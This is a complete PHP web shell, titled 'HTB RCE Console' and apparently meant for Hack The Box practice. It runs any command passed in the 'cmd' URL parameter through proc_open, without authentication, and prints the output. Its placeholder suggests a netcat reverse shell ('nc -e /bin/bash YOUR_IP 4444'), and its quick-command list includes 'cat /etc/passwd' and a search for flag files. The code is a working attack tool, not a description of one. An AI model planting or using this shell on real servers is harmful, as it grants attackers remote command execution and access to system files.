📖 File Reader
<!DOCTYPE html>
<html>
<head>
<title>HTB RCE Console</title>
<style>
body {
font-family: 'Courier New', monospace;
background: #1a1a1a;
color: #00ff00;
margin: 0;
padding: 20px;
}
.container { max-width: 1000px; margin: 0 auto; }
h1 { color: #ff4444; text-align: center; text-shadow: 0 0 10px #ff4444; }
form {
background: #2a2a2a;
padding: 20px;
border-radius: 10px;
border: 2px solid #00ff00;
margin-bottom: 20px;
}
input[type="text"] {
width: 80%;
padding: 12px;
background: #000;
border: 2px solid #00ff00;
color: #00ff00;
font-family: monospace;
font-size: 14px;
}
input[type="submit"] {
width: 18%;
padding: 12px;
background: #ff4444;
border: none;
color: white;
font-weight: bold;
cursor: pointer;
font-family: monospace;
}
input[type="submit"]:hover { background: #ff6666; }
pre {
background: #000;
padding: 20px;
border: 1px solid #333;
border-radius: 5px;
overflow-x: auto;
white-space: pre-wrap;
line-height: 1.4;
font-size: 13px;
}
.stdout { color: #00ff00; }
.stderr { color: #ff4444; }
.info { color: #00aaff; }
.status {
padding: 10px;
background: #333;
border-radius: 5px;
margin-bottom: 10px;
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1>🔥 HTB RCE CONSOLE 🔥</h1>
<div class="status info">
Target: <?php echo $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']); ?> |
User: <?php echo get_current_user(); ?> |
PHP: <?php echo phpversion(); ?>
</div>
<form method="GET">
<input type="text" name="cmd" id="cmd"
placeholder="whoami | id | ls -la | find / -name flag* 2>/dev/null | nc -e /bin/bash YOUR_IP 4444"
value="<?php echo isset($_GET['cmd']) ? htmlspecialchars($_GET['cmd']) : ''; ?>">
<input type="submit" value="EXECUTE">
</form>
<?php
if(isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<div class='status'>📤 Executing: <span style='color:#ffff00;'>$cmd</span></div>";
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($cmd, $descriptorspec, $pipes);
if(is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$error = stream_get_contents($pipes[2]);
fclose($pipes[2]);
$return_code = proc_close($process);
echo "<pre class='stdout'>📥 STDOUT:\n$output</pre>";
if($error || $return_code !== 0) {
echo "<pre class='stderr'>❌ STDERR (Code: $return_code):\n$error</pre>";
}
} else {
echo "<pre class='stderr'>❌ Failed to execute command</pre>";
}
}
?>
<div style="margin-top: 30px; font-size: 12px; color: #888;">
<strong>Quick Commands:</strong> whoami | id | pwd | ls -la | cat /etc/passwd | find / -name "*flag*" 2>/dev/null
</div>
</div>
<script>
document.getElementById("cmd").focus();
document.getElementById("cmd").select();
</script>
</body>
</html>